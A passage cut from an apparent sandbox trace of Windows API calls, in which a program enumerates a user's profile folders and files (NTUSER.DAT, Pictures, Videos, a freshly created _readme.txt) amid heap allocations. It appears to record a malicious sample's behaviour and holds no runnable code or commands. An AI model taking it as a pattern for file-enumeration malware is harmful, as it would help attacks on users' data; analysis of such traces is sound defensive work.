ftLastWriteTime.dwLowDateTime=0xadfc6210, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0180.676] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xadf79f50, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0180.676] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79bf3690, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0180.676] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0180.676] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79c197f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79c197f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0180.676] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79c3f950, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79c3f950, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0180.676] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7945d070, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7945d070, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0180.676] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0180.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x214) returned 0x2a7d6f0 [0180.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0180.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0180.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05af8 [0180.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1fd8 [0180.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2020 [0180.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2068 [0180.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae20b0 [0180.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae20f8 [0180.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2140 [0180.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0180.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2188 [0180.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40370 [0180.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae21d0 [0180.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0180.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0180.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0180.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0180.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0180.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1eb8 | out: hHeap=0x2c0000) returned 1 [0180.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1f00 | out: hHeap=0x2c0000) returned 1 [0180.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1f48 | out: hHeap=0x2c0000) returned 1 [0180.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1f90 | out: hHeap=0x2c0000) returned 1 [0180.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0180.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b40 | out: hHeap=0x2c0000) returned 1 [0180.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a401b8 | out: hHeap=0x2c0000) returned 1 [0180.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0180.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0180.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0180.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.682] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x995cf350, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x995cf350, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0180.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b40 [0180.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.683] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0180.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.684] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0180.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0180.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.685] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0180.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0180.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.686] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0180.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0180.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.687] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0180.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x310) returned 0x2adf6e8 [0180.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f90 [0180.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a401b8 [0180.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f48 [0180.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f00 [0180.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1eb8 [0180.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2218 [0180.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2260 [0180.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae22a8 [0180.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae22f0 [0180.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2338 [0180.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0180.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2380 [0180.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae23c8 [0180.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2410 [0180.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2458 [0180.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae24a0 [0180.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae24e8 [0180.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2530 [0180.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0180.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0180.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05af8 | out: hHeap=0x2c0000) returned 1 [0180.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1fd8 | out: hHeap=0x2c0000) returned 1 [0180.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2020 | out: hHeap=0x2c0000) returned 1 [0180.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2068 | out: hHeap=0x2c0000) returned 1 [0180.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae20b0 | out: hHeap=0x2c0000) returned 1 [0180.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae20f8 | out: hHeap=0x2c0000) returned 1 [0180.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2140 | out: hHeap=0x2c0000) returned 1 [0180.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0180.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2188 | out: hHeap=0x2c0000) returned 1 [0180.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40370 | out: hHeap=0x2c0000) returned 1 [0180.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae21d0 | out: hHeap=0x2c0000) returned 1 [0180.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0180.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b40 | out: hHeap=0x2c0000) returned 1 [0180.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0180.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0180.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0180.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0180.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0180.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0180.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.696] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0180.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0180.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.696] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0180.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0180.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.697] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9ac462f0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9ac462f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0180.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.698] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5b54690, ftCreationTime.dwHighDateTime=0x1d8a8d3, ftLastAccessTime.dwLowDateTime=0xe5b54690, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe5b54690, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0180.698] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5b54690, ftCreationTime.dwHighDateTime=0x1d8a8d3, ftLastAccessTime.dwLowDateTime=0xe5b54690, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe5b54690, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0180.698] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0180.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0180.700] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0180.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0180.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0180.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0180.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0180.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0180.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0180.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79a0 | out: hHeap=0x2c0000) returned 1 [0180.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0180.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0180.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 